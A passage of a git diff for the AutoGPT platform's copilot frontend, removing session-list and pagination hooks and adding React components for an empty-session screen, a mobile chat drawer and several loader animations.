-  onSelectSession: (sessionId: string) => void;
-  onFetchNextPage: () => void;
-}
-
-export function SessionsList({
-  sessions,
-  currentSessionId,
-  isLoading,
-  hasNextPage,
-  isFetchingNextPage,
-  onSelectSession,
-  onFetchNextPage,
-}: Props) {
-  if (isLoading) {
-    return (
-      <div className="space-y-1">
-        {Array.from({ length: 5 }).map((_, i) => (
-          <div key={i} className="rounded-lg px-3 py-2.5">
-            <Skeleton className="h-5 w-full" />
-          </div>
-        ))}
-      </div>
-    );
-  }
-
-  if (sessions.length === 0) {
-    return (
-      <div className="flex h-full items-center justify-center">
-        <Text variant="body" className="text-zinc-500">
-          You don&apos;t have previous chats
-        </Text>
-      </div>
-    );
-  }
-
-  return (
-    <InfiniteList
-      items={sessions}
-      hasMore={hasNextPage}
-      isFetchingMore={isFetchingNextPage}
-      onEndReached={onFetchNextPage}
-      className="space-y-1"
-      renderItem={(session) => {
-        const isActive = session.id === currentSessionId;
-        return (
-          <button
-            onClick={() => onSelectSession(session.id)}
-            className={cn(
-              "w-full rounded-lg px-3 py-2.5 text-left transition-colors",
-              isActive ? "bg-zinc-100" : "hover:bg-zinc-50",
-            )}
-          >
-            <Text
-              variant="body"
-              className={cn(
-                "font-normal",
-                isActive ? "text-zinc-600" : "text-zinc-800",
-              )}
-            >
-              {getSessionTitle(session)}
-            </Text>
-          </button>
-        );
-      }}
-    />
-  );
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/SessionsList/useSessionsPagination.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/SessionsList/useSessionsPagination.ts
@@ -1,91 +0,0 @@
-import { useGetV2ListSessions } from "@/app/api/__generated__/endpoints/chat/chat";
-import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
-import { okData } from "@/app/api/helpers";
-import { useEffect, useState } from "react";
-
-const PAGE_SIZE = 50;
-
-export interface UseSessionsPaginationArgs {
-  enabled: boolean;
-}
-
-export function useSessionsPagination({ enabled }: UseSessionsPaginationArgs) {
-  const [offset, setOffset] = useState(0);
-
-  const [accumulatedSessions, setAccumulatedSessions] = useState<
-    SessionSummaryResponse[]
-  >([]);
-
-  const [totalCount, setTotalCount] = useState<number | null>(null);
-
-  const { data, isLoading, isFetching, isError } = useGetV2ListSessions(
-    { limit: PAGE_SIZE, offset },
-    {
-      query: {
-        enabled: enabled && offset >= 0,
-      },
-    },
-  );
-
-  useEffect(() => {
-    const responseData = okData(data);
-    if (responseData) {
-      const newSessions = responseData.sessions;
-      const total = responseData.total;
-      setTotalCount(total);
-
-      if (offset === 0) {
-        setAccumulatedSessions(newSessions);
-      } else {
-        setAccumulatedSessions((prev) => [...prev, ...newSessions]);
-      }
-    } else if (!enabled) {
-      setAccumulatedSessions([]);
-      setTotalCount(null);
-    }
-  }, [data, offset, enabled]);
-
-  const hasNextPage =
-    totalCount !== null && accumulatedSessions.length < totalCount;
-
-  const areAllSessionsLoaded =
-    totalCount !== null &&
-    accumulatedSessions.length >= totalCount &&
-    !isFetching &&
-    !isLoading;
-
-  useEffect(() => {
-    if (
-      hasNextPage &&
-      !isFetching &&
-      !isLoading &&
-      !isError &&
-      totalCount !== null
-    ) {
-      setOffset((prev) => prev + PAGE_SIZE);
-    }
-  }, [hasNextPage, isFetching, isLoading, isError, totalCount]);
-
-  const fetchNextPage = () => {
-    if (hasNextPage && !isFetching) {
-      setOffset((prev) => prev + PAGE_SIZE);
-    }
-  };
-
-  const reset = () => {
-    // Only reset the offset - keep existing sessions visible during refetch
-    // The effect will replace sessions when new data arrives at offset 0
-    setOffset(0);
-  };
-
-  return {
-    sessions: accumulatedSessions,
-    isLoading,
-    isFetching,
-    hasNextPage,
-    areAllSessionsLoaded,
-    totalCount,
-    fetchNextPage,
-    reset,
-  };
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/helpers.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/helpers.ts
@@ -1,106 +0,0 @@
-import type { SessionDetailResponse } from "@/app/api/__generated__/models/sessionDetailResponse";
-import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
-import { format, formatDistanceToNow, isToday } from "date-fns";
-
-export function convertSessionDetailToSummary(session: SessionDetailResponse) {
-  return {
-    id: session.id,
-    created_at: session.created_at,
-    updated_at: session.updated_at,
-    title: undefined,
-  };
-}
-
-export function filterVisibleSessions(sessions: SessionSummaryResponse[]) {
-  const fiveMinutesAgo = Date.now() - 5 * 60 * 1000;
-  return sessions.filter((session) => {
-    const hasBeenUpdated = session.updated_at !== session.created_at;
-
-    if (hasBeenUpdated) return true;
-
-    const isRecentlyCreated =
-      new Date(session.created_at).getTime() > fiveMinutesAgo;
-
-    return isRecentlyCreated;
-  });
-}
-
-export function getSessionTitle(session: SessionSummaryResponse) {
-  if (session.title) return session.title;
-
-  const isNewSession = session.updated_at === session.created_at;
-
-  if (isNewSession) {
-    const createdDate = new Date(session.created_at);
-    if (isToday(createdDate)) {
-      return "Today";
-    }
-    return format(createdDate, "MMM d, yyyy");
-  }
-
-  return "Untitled Chat";
-}
-
-export function getSessionUpdatedLabel(session: SessionSummaryResponse) {
-  if (!session.updated_at) return "";
-  return formatDistanceToNow(new Date(session.updated_at), { addSuffix: true });
-}
-
-export function mergeCurrentSessionIntoList(
-  accumulatedSessions: SessionSummaryResponse[],
-  currentSessionId: string | null,
-  currentSessionData: SessionDetailResponse | null | undefined,
-  recentlyCreatedSessions?: Map<string, SessionSummaryResponse>,
-) {
-  const filteredSessions: SessionSummaryResponse[] = [];
-  const addedIds = new Set<string>();
-
-  if (accumulatedSessions.length > 0) {
-    const visibleSessions = filterVisibleSessions(accumulatedSessions);
-
-    if (currentSessionId) {
-      const currentInAll = accumulatedSessions.find(
-        (s) => s.id === currentSessionId,
-      );
-      if (currentInAll) {
-        const isInVisible = visibleSessions.some(
-          (s) => s.id === currentSessionId,
-        );
-        if (!isInVisible) {
-          filteredSessions.push(currentInAll);
-          addedIds.add(currentInAll.id);
-        }
-      }
-    }
-
-    for (const session of visibleSessions) {
-      if (!addedIds.has(session.id)) {
-        filteredSessions.push(session);
-        addedIds.add(session.id);
-      }
-    }
-  }
-
-  if (currentSessionId && currentSessionData) {
-    if (!addedIds.has(currentSessionId)) {
-      const summarySession = convertSessionDetailToSummary(currentSessionData);
-      filteredSessions.unshift(summarySession);
-      addedIds.add(currentSessionId);
-    }
-  }
-
-  if (recentlyCreatedSessions) {
-    for (const [sessionId, sessionData] of recentlyCreatedSessions) {
-      if (!addedIds.has(sessionId)) {
-        filteredSessions.unshift(sessionData);
-        addedIds.add(sessionId);
-      }
-    }
-  }
-
-  return filteredSessions;
-}
-
-export function getCurrentSessionId(searchParams: URLSearchParams) {
-  return searchParams.get("sessionId");
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/useCopilotShell.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/useCopilotShell.ts
@@ -1,124 +0,0 @@
-"use client";
-
-import {
-  getGetV2GetSessionQueryKey,
-  getGetV2ListSessionsQueryKey,
-  useGetV2GetSession,
-} from "@/app/api/__generated__/endpoints/chat/chat";
-import { okData } from "@/app/api/helpers";
-import { useChatStore } from "@/components/contextual/Chat/chat-store";
-import { useBreakpoint } from "@/lib/hooks/useBreakpoint";
-import { useSupabase } from "@/lib/supabase/hooks/useSupabase";
-import { useQueryClient } from "@tanstack/react-query";
-import { usePathname, useSearchParams } from "next/navigation";
-import { useCopilotStore } from "../../copilot-page-store";
-import { useCopilotSessionId } from "../../useCopilotSessionId";
-import { useMobileDrawer } from "./components/MobileDrawer/useMobileDrawer";
-import { getCurrentSessionId } from "./helpers";
-import { useShellSessionList } from "./useShellSessionList";
-
-export function useCopilotShell() {
-  const pathname = usePathname();
-  const searchParams = useSearchParams();
-  const queryClient = useQueryClient();
-  const breakpoint = useBreakpoint();
-  const { isLoggedIn } = useSupabase();
-  const isMobile =
-    breakpoint === "base" || breakpoint === "sm" || breakpoint === "md";
-
-  const { urlSessionId, setUrlSessionId } = useCopilotSessionId();
-
-  const isOnHomepage = pathname === "/copilot";
-  const paramSessionId = searchParams.get("sessionId");
-
-  const {
-    isDrawerOpen,
-    handleOpenDrawer,
-    handleCloseDrawer,
-    handleDrawerOpenChange,
-  } = useMobileDrawer();
-
-  const paginationEnabled = !isMobile || isDrawerOpen || !!paramSessionId;
-
-  const currentSessionId = getCurrentSessionId(searchParams);
-
-  const { data: currentSessionData } = useGetV2GetSession(
-    currentSessionId || "",
-    {
-      query: {
-        enabled: !!currentSessionId,
-        select: okData,
-      },
-    },
-  );
-
-  const {
-    sessions,
-    isLoading,
-    isSessionsFetching,
-    hasNextPage,
-    fetchNextPage,
-    resetPagination,
-    recentlyCreatedSessionsRef,
-  } = useShellSessionList({
-    paginationEnabled,
-    currentSessionId,
-    currentSessionData,
-    isOnHomepage,
-    paramSessionId,
-  });
-
-  const stopStream = useChatStore((s) => s.stopStream);
-  const isCreatingSession = useCopilotStore((s) => s.isCreatingSession);
-
-  function handleSessionClick(sessionId: string) {
-    if (sessionId === currentSessionId) return;
-
-    // Stop current stream - SSE reconnection allows resuming later
-    if (currentSessionId) {
-      stopStream(currentSessionId);
-    }
-
-    if (recentlyCreatedSessionsRef.current.has(sessionId)) {
-      queryClient.invalidateQueries({
-        queryKey: getGetV2GetSessionQueryKey(sessionId),
-      });
-    }
-    setUrlSessionId(sessionId, { shallow: false });
-    if (isMobile) handleCloseDrawer();
-  }
-
-  function handleNewChatClick() {
-    // Stop current stream - SSE reconnection allows resuming later
-    if (currentSessionId) {
-      stopStream(currentSessionId);
-    }
-
-    resetPagination();
-    queryClient.invalidateQueries({
-      queryKey: getGetV2ListSessionsQueryKey(),
-    });
-    setUrlSessionId(null, { shallow: false });
-    if (isMobile) handleCloseDrawer();
-  }
-
-  return {
-    isMobile,
-    isDrawerOpen,
-    isLoggedIn,
-    hasActiveSession:
-      Boolean(currentSessionId) && (!isOnHomepage || Boolean(paramSessionId)),
-    isLoading: isLoading || isCreatingSession,
-    isCreatingSession,
-    sessions,
-    currentSessionId: urlSessionId,
-    handleOpenDrawer,
-    handleCloseDrawer,
-    handleDrawerOpenChange,
-    handleNewChatClick,
-    handleSessionClick,
-    hasNextPage,
-    isFetchingNextPage: isSessionsFetching,
-    fetchNextPage,
-  };
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/useShellSessionList.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/useShellSessionList.ts
@@ -1,113 +0,0 @@
-import { getGetV2ListSessionsQueryKey } from "@/app/api/__generated__/endpoints/chat/chat";
-import type { SessionDetailResponse } from "@/app/api/__generated__/models/sessionDetailResponse";
-import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
-import { useChatStore } from "@/components/contextual/Chat/chat-store";
-import { useQueryClient } from "@tanstack/react-query";
-import { useEffect, useMemo, useRef } from "react";
-import { useSessionsPagination } from "./components/SessionsList/useSessionsPagination";
-import {
-  convertSessionDetailToSummary,
-  filterVisibleSessions,
-  mergeCurrentSessionIntoList,
-} from "./helpers";
-
-interface UseShellSessionListArgs {
-  paginationEnabled: boolean;
-  currentSessionId: string | null;
-  currentSessionData: SessionDetailResponse | null | undefined;
-  isOnHomepage: boolean;
-  paramSessionId: string | null;
-}
-
-export function useShellSessionList({
-  paginationEnabled,
-  currentSessionId,
-  currentSessionData,
-  isOnHomepage,
-  paramSessionId,
-}: UseShellSessionListArgs) {
-  const queryClient = useQueryClient();
-  const onStreamComplete = useChatStore((s) => s.onStreamComplete);
-
-  const {
-    sessions: accumulatedSessions,
-    isLoading: isSessionsLoading,
-    isFetching: isSessionsFetching,
-    hasNextPage,
-    fetchNextPage,
-    reset: resetPagination,
-  } = useSessionsPagination({
-    enabled: paginationEnabled,
-  });
-
-  const recentlyCreatedSessionsRef = useRef<
-    Map<string, SessionSummaryResponse>
-  >(new Map());
-
-  useEffect(() => {
-    if (isOnHomepage && !paramSessionId) {
-      queryClient.invalidateQueries({
-        queryKey: getGetV2ListSessionsQueryKey(),
-      });
-    }
-  }, [isOnHomepage, paramSessionId, queryClient]);
-
-  useEffect(() => {
-    if (currentSessionId && currentSessionData) {
-      const isNewSession =
-        currentSessionData.updated_at === currentSessionData.created_at;
-      const isNotInAccumulated = !accumulatedSessions.some(
-        (s) => s.id === currentSessionId,
-      );
-      if (isNewSession || isNotInAccumulated) {
-        const summary = convertSessionDetailToSummary(currentSessionData);
-        recentlyCreatedSessionsRef.current.set(currentSessionId, summary);
-      }
-    }
-  }, [currentSessionId, currentSessionData, accumulatedSessions]);
-
-  useEffect(() => {
-    for (const sessionId of recentlyCreatedSessionsRef.current.keys()) {
-      if (accumulatedSessions.some((s) => s.id === sessionId)) {
-        recentlyCreatedSessionsRef.current.delete(sessionId);
-      }
-    }
-  }, [accumulatedSessions]);
-
-  useEffect(() => {
-    const unsubscribe = onStreamComplete(() => {
-      queryClient.invalidateQueries({
-        queryKey: getGetV2ListSessionsQueryKey(),
-      });
-    });
-    return unsubscribe;
-  }, [onStreamComplete, queryClient]);
-
-  const sessions = useMemo(
-    () =>
-      mergeCurrentSessionIntoList(
-        accumulatedSessions,
-        currentSessionId,
-        currentSessionData,
-        recentlyCreatedSessionsRef.current,
-      ),
-    [accumulatedSessions, currentSessionId, currentSessionData],
-  );
-
-  const visibleSessions = useMemo(
-    () => filterVisibleSessions(sessions),
-    [sessions],
-  );
-
-  const isLoading = isSessionsLoading && accumulatedSessions.length === 0;
-
-  return {
-    sessions: visibleSessions,
-    isLoading,
-    isSessionsFetching,
-    hasNextPage,
-    fetchNextPage,
-    resetPagination,
-    recentlyCreatedSessionsRef,
-  };
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/EmptySession/EmptySession.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/EmptySession/EmptySession.tsx
@@ -0,0 +1,111 @@
+"use client";
+
+import { ChatInput } from "@/app/(platform)/copilot/components/ChatInput/ChatInput";
+import { Button } from "@/components/atoms/Button/Button";
+import { Text } from "@/components/atoms/Text/Text";
+import { useSupabase } from "@/lib/supabase/hooks/useSupabase";
+import { SpinnerGapIcon } from "@phosphor-icons/react";
+import { motion } from "framer-motion";
+import { useEffect, useState } from "react";
+import {
+  getGreetingName,
+  getInputPlaceholder,
+  getQuickActions,
+} from "./helpers";
+
+interface Props {
+  inputLayoutId: string;
+  isCreatingSession: boolean;
+  onCreateSession: () => void | Promise<string>;
+  onSend: (message: string) => void | Promise<void>;
+}
+
+export function EmptySession({
+  inputLayoutId,
+  isCreatingSession,
+  onSend,
+}: Props) {
+  const { user } = useSupabase();
+  const greetingName = getGreetingName(user);
+  const quickActions = getQuickActions();
+  const [loadingAction, setLoadingAction] = useState<string | null>(null);
+  const [inputPlaceholder, setInputPlaceholder] = useState(
+    getInputPlaceholder(),
+  );
+
+  useEffect(() => {
+    setInputPlaceholder(getInputPlaceholder(window.innerWidth));
+  }, [window.innerWidth]);
+
+  async function handleQuickActionClick(action: string) {
+    if (isCreatingSession || loadingAction) return;
+
+    setLoadingAction(action);
+    try {
+      await onSend(action);
+    } finally {
+      setLoadingAction(null);
+    }
+  }
+
+  return (
+    <div className="flex h-full flex-1 items-center justify-center overflow-y-auto bg-[#f8f8f9] px-0 py-5 md:px-6 md:py-10">
+      <motion.div
+        className="w-full max-w-3xl text-center"
+        initial={{ opacity: 0 }}
+        animate={{ opacity: 1 }}
+        transition={{ duration: 0.3 }}
+      >
+        <div className="mx-auto max-w-3xl">
+          <Text variant="h3" className="mb-1 !text-[1.375rem] text-zinc-700">
+            Hey, <span className="text-violet-600">{greetingName}</span>
+          </Text>
+          <Text variant="h3" className="mb-8 !font-normal">
+            Tell me about your work — I&apos;ll find what to automate.
+          </Text>
+
+          <div className="mb-6">
+            <motion.div
+              layoutId={inputLayoutId}
+              transition={{ type: "spring", bounce: 0.2, duration: 0.65 }}
+              className="w-full px-2"
+            >
+              <ChatInput
+                inputId="chat-input-empty"
+                onSend={onSend}
+                disabled={isCreatingSession}
+                placeholder={inputPlaceholder}
+                className="w-full"
+              />
+            </motion.div>
+          </div>
+        </div>
+
+        <div className="flex flex-wrap items-center justify-center gap-3 overflow-x-auto [-ms-overflow-style:none] [scrollbar-width:none] [&::-webkit-scrollbar]:hidden">
+          {quickActions.map((action) => (
+            <Button
+              key={action}
+              type="button"
+              variant="outline"
+              size="small"
+              onClick={() => void handleQuickActionClick(action)}
+              disabled={isCreatingSession || loadingAction !== null}
+              aria-busy={loadingAction === action}
+              leftIcon={
+                loadingAction === action ? (
+                  <SpinnerGapIcon
+                    className="h-4 w-4 animate-spin"
+                    weight="bold"
+                  />
+                ) : null
+              }
+              className="h-auto shrink-0 border-zinc-300 px-3 py-2 text-[.9rem] text-zinc-600"
+            >
+              {action}
+            </Button>
+          ))}
+        </div>
+      </motion.div>
+    </div>
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/EmptySession/helpers.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/EmptySession/helpers.ts
@@ -1,6 +1,26 @@
-import type { User } from "@supabase/supabase-js";
+import { User } from "@supabase/supabase-js";

-export function getGreetingName(user?: User | null): string {
+export function getInputPlaceholder(width?: number) {
+  if (!width) return "What's your role and what eats up most of your day?";
+
+  if (width < 500) {
+    return "I'm a chef and I hate...";
+  }
+  if (width <= 1080) {
+    return "What's your role and what eats up most of your day?";
+  }
+  return "What's your role and what eats up most of your day? e.g. 'I'm a recruiter and I hate...'";
+}
+
+export function getQuickActions() {
+  return [
+    "I don't know where to start, just ask me stuff",
+    "I do the same thing every week and it's killing me",
+    "Help me find where I'm wasting my time",
+  ];
+}
+
+export function getGreetingName(user?: User | null) {
  if (!user) return "there";
  const metadata = user.user_metadata as Record<string, unknown> | undefined;
  const fullName = metadata?.full_name;
@@ -16,30 +36,3 @@ export function getGreetingName(user?: User | null): string {
  }
  return "there";
 }
-
-export function buildCopilotChatUrl(prompt: string): string {
-  const trimmed = prompt.trim();
-  if (!trimmed) return "/copilot/chat";
-  const encoded = encodeURIComponent(trimmed);
-  return `/copilot/chat?prompt=${encoded}`;
-}
-
-export function getQuickActions(): string[] {
-  return [
-    "I don't know where to start, just ask me stuff",
-    "I do the same thing every week and it's killing me",
-    "Help me find where I'm wasting my time",
-  ];
-}
-
-export function getInputPlaceholder(width?: number) {
-  if (!width) return "What's your role and what eats up most of your day?";
-
-  if (width < 500) {
-    return "I'm a chef and I hate...";
-  }
-  if (width <= 1080) {
-    return "What's your role and what eats up most of your day?";
-  }
-  return "What's your role and what eats up most of your day? e.g. 'I'm a recruiter and I hate...'";
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/MobileDrawer/MobileDrawer.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/MobileDrawer/MobileDrawer.tsx
@@ -0,0 +1,140 @@
+import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
+import { Button } from "@/components/atoms/Button/Button";
+import { Text } from "@/components/atoms/Text/Text";
+import { scrollbarStyles } from "@/components/styles/scrollbars";
+import { cn } from "@/lib/utils";
+import { PlusIcon, SpinnerGapIcon, X } from "@phosphor-icons/react";
+import { Drawer } from "vaul";
+
+interface Props {
+  isOpen: boolean;
+  sessions: SessionSummaryResponse[];
+  currentSessionId: string | null;
+  isLoading: boolean;
+  onSelectSession: (sessionId: string) => void;
+  onNewChat: () => void;
+  onClose: () => void;
+  onOpenChange: (open: boolean) => void;
+}
+
+function formatDate(dateString: string) {
+  const date = new Date(dateString);
+  const now = new Date();
+  const diffMs = now.getTime() - date.getTime();
+  const diffDays = Math.floor(diffMs / (1000 * 60 * 60 * 24));
+
+  if (diffDays === 0) return "Today";
+  if (diffDays === 1) return "Yesterday";
+  if (diffDays < 7) return `${diffDays} days ago`;
+
+  const day = date.getDate();
+  const ordinal =
+    day % 10 === 1 && day !== 11
+      ? "st"
+      : day % 10 === 2 && day !== 12
+        ? "nd"
+        : day % 10 === 3 && day !== 13
+          ? "rd"
+          : "th";
+  const month = date.toLocaleDateString("en-US", { month: "short" });
+  const year = date.getFullYear();
+
+  return `${day}${ordinal} ${month} ${year}`;
+}
+
+export function MobileDrawer({
+  isOpen,
+  sessions,
+  currentSessionId,
+  isLoading,
+  onSelectSession,
+  onNewChat,
+  onClose,
+  onOpenChange,
+}: Props) {
+  return (
+    <Drawer.Root open={isOpen} onOpenChange={onOpenChange} direction="left">
+      <Drawer.Portal>
+        <Drawer.Overlay className="fixed inset-0 z-[60] bg-black/10 backdrop-blur-sm" />
+        <Drawer.Content className="fixed left-0 top-0 z-[70] flex h-full w-80 flex-col border-r border-zinc-200 bg-zinc-50">
+          <div className="shrink-0 border-b border-zinc-200 px-4 py-2">
+            <div className="flex items-center justify-between">
+              <Drawer.Title className="text-lg font-semibold text-zinc-800">
+                Your chats
+              </Drawer.Title>
+              <Button
+                variant="icon"
+                size="icon"
+                aria-label="Close sessions"
+                onClick={onClose}
+              >
+                <X width="1rem" height="1rem" />
+              </Button>
+            </div>
+          </div>
+          <div
+            className={cn(
+              "flex min-h-0 flex-1 flex-col gap-1 overflow-y-auto px-3 py-3",
+              scrollbarStyles,
+            )}
+          >
+            {isLoading ? (
+              <div className="flex items-center justify-center py-4">
+                <SpinnerGapIcon className="h-5 w-5 animate-spin text-neutral-400" />
+              </div>
+            ) : sessions.length === 0 ? (
+              <p className="py-4 text-center text-sm text-neutral-500">
+                No conversations yet
+              </p>
+            ) : (
+              sessions.map((session) => (
+                <button
+                  key={session.id}
+                  onClick={() => onSelectSession(session.id)}
+                  className={cn(
+                    "w-full rounded-lg px-3 py-2.5 text-left transition-colors",
+                    session.id === currentSessionId
+                      ? "bg-zinc-100"
+                      : "hover:bg-zinc-50",
+                  )}
+                >
+                  <div className="flex min-w-0 max-w-full flex-col overflow-hidden">
+                    <div className="min-w-0 max-w-full">
+                      <Text
+                        variant="body"
+                        className={cn(
+                          "truncate font-normal",
+                          session.id === currentSessionId
+                            ? "text-zinc-600"
+                            : "text-zinc-800",
+                        )}
+                      >
+                        {session.title || "Untitled chat"}
+                      </Text>
+                    </div>
+                    <Text variant="small" className="text-neutral-400">
+                      {formatDate(session.updated_at)}
+                    </Text>
+                  </div>
+                </button>
+              ))
+            )}
+          </div>
+          {currentSessionId && (
+            <div className="shrink-0 bg-white p-3 shadow-[0_-4px_6px_-1px_rgba(0,0,0,0.05)]">
+              <Button
+                variant="primary"
+                size="small"
+                onClick={onNewChat}
+                className="w-full"
+                leftIcon={<PlusIcon width="1rem" height="1rem" />}
+              >
+                New Chat
+              </Button>
+            </div>
+          )}
+        </Drawer.Content>
+      </Drawer.Portal>
+    </Drawer.Root>
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/MobileHeader/MobileHeader.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/MobileHeader/MobileHeader.tsx
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/MorphingTextAnimation/MorphingTextAnimation.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/MorphingTextAnimation/MorphingTextAnimation.tsx
@@ -0,0 +1,54 @@
+import { cn } from "@/lib/utils";
+import { AnimatePresence, motion } from "framer-motion";
+
+interface Props {
+  text: string;
+  className?: string;
+}
+
+export function MorphingTextAnimation({ text, className }: Props) {
+  const letters = text.split("");
+
+  return (
+    <div className={cn(className)}>
+      <AnimatePresence mode="popLayout" initial={false}>
+        <motion.div key={text} className="whitespace-nowrap">
+          <motion.span className="inline-flex overflow-hidden">
+            {letters.map((char, index) => (
+              <motion.span
+                key={`${text}-${index}`}
+                initial={{
+                  opacity: 0,
+                  y: 8,
+                  rotateX: "80deg",
+                  filter: "blur(6px)",
+                }}
+                animate={{
+                  opacity: 1,
+                  y: 0,
+                  rotateX: "0deg",
+                  filter: "blur(0px)",
+                }}
+                exit={{
+                  opacity: 0,
+                  y: -8,
+                  rotateX: "-80deg",
+                  filter: "blur(6px)",
+                }}
+                style={{ willChange: "transform" }}
+                transition={{
+                  delay: 0.015 * index,
+                  type: "spring",
+                  bounce: 0.5,
+                }}
+                className="inline-block"
+              >
+                {char === " " ? "\u00A0" : char}
+              </motion.span>
+            ))}
+          </motion.span>
+        </motion.div>
+      </AnimatePresence>
+    </div>
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/OrbitLoader/OrbitLoader.module.css
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/OrbitLoader/OrbitLoader.module.css
@@ -0,0 +1,69 @@
+.loader {
+  position: relative;
+  animation: rotate 1s infinite;
+}
+
+.loader::before,
+.loader::after {
+  border-radius: 50%;
+  content: "";
+  display: block;
+  /* 40% of container size */
+  height: 40%;
+  width: 40%;
+}
+
+.loader::before {
+  animation: ball1 1s infinite;
+  background-color: #a1a1aa; /* zinc-400 */
+  box-shadow: calc(var(--spacing)) 0 0 #18181b; /* zinc-900 */
+  margin-bottom: calc(var(--gap));
+}
+
+.loader::after {
+  animation: ball2 1s infinite;
+  background-color: #18181b; /* zinc-900 */
+  box-shadow: calc(var(--spacing)) 0 0 #a1a1aa; /* zinc-400 */
+}
+
+@keyframes rotate {
+  0% {
+    transform: rotate(0deg) scale(0.8);
+  }
+  50% {
+    transform: rotate(360deg) scale(1.2);
+  }
+  100% {
+    transform: rotate(720deg) scale(0.8);
+  }
+}
+
+@keyframes ball1 {
+  0% {
+    box-shadow: calc(var(--spacing)) 0 0 #18181b;
+  }
+  50% {
+    box-shadow: 0 0 0 #18181b;
+    margin-bottom: 0;
+    transform: translate(calc(var(--spacing) / 2), calc(var(--spacing) / 2));
+  }
+  100% {
+    box-shadow: calc(var(--spacing)) 0 0 #18181b;
+    margin-bottom: calc(var(--gap));
+  }
+}
+
+@keyframes ball2 {
+  0% {
+    box-shadow: calc(var(--spacing)) 0 0 #a1a1aa;
+  }
+  50% {
+    box-shadow: 0 0 0 #a1a1aa;
+    margin-top: calc(var(--ball-size) * -1);
+    transform: translate(calc(var(--spacing) / 2), calc(var(--spacing) / 2));
+  }
+  100% {
+    box-shadow: calc(var(--spacing)) 0 0 #a1a1aa;
+    margin-top: 0;
+  }
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/OrbitLoader/OrbitLoader.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/OrbitLoader/OrbitLoader.tsx
@@ -0,0 +1,28 @@
+import { cn } from "@/lib/utils";
+import styles from "./OrbitLoader.module.css";
+
+interface Props {
+  size?: number;
+  className?: string;
+}
+
+export function OrbitLoader({ size = 24, className }: Props) {
+  const ballSize = Math.round(size * 0.4);
+  const spacing = Math.round(size * 0.6);
+  const gap = Math.round(size * 0.2);
+
+  return (
+    <div
+      className={cn(styles.loader, className)}
+      style={
+        {
+          width: size,
+          height: size,
+          "--ball-size": `${ballSize}px`,
+          "--spacing": `${spacing}px`,
+          "--gap": `${gap}px`,
+        } as React.CSSProperties
+      }
+    />
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/ProgressBar/ProgressBar.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/ProgressBar/ProgressBar.tsx
@@ -0,0 +1,26 @@
+import { cn } from "@/lib/utils";
+
+interface Props {
+  value: number;
+  label?: string;
+  className?: string;
+}
+
+export function ProgressBar({ value, label, className }: Props) {
+  const clamped = Math.min(100, Math.max(0, value));
+
+  return (
+    <div className={cn("flex flex-col gap-1.5", className)}>
+      <div className="flex items-center justify-between text-xs text-neutral-500">
+        <span>{label ?? "Working on it..."}</span>
+        <span>{Math.round(clamped)}%</span>
+      </div>
+      <div className="h-2 w-full overflow-hidden rounded-full bg-neutral-200">
+        <div
+          className="h-full rounded-full bg-neutral-900 transition-[width] duration-300 ease-out"
+          style={{ width: `${clamped}%` }}
+        />
+      </div>
+    </div>
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/PulseLoader/PulseLoader.module.css
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/PulseLoader/PulseLoader.module.css
@@ -0,0 +1,34 @@
+.loader {
+  position: relative;
+  display: inline-block;
+  flex-shrink: 0;
+}
+
+.loader::before,
+.loader::after {
+  content: "";
+  box-sizing: border-box;
+  width: 100%;
+  height: 100%;
+  border-radius: 50%;
+  background: currentColor;
+  position: absolute;
+  left: 0;
+  top: 0;
+  animation: ripple 2s linear infinite;
+}
+
+.loader::after {
+  animation-delay: 1s;
+}
+
+@keyframes ripple {
+  0% {
+    transform: scale(0);
+    opacity: 1;
+  }
+  100% {
+    transform: scale(1);
+    opacity: 0;
+  }
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/PulseLoader/PulseLoader.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/PulseLoader/PulseLoader.tsx
@@ -0,0 +1,16 @@
+import { cn } from "@/lib/utils";
+import styles from "./PulseLoader.module.css";
+
+interface Props {
+  size?: number;
+  className?: string;
+}
+
+export function PulseLoader({ size = 24, className }: Props) {
+  return (
+    <div
+      className={cn(styles.loader, className)}
+      style={{ width: size, height: size }}
+    />
+  );
+}
--- a/Show More
+++ b/Show More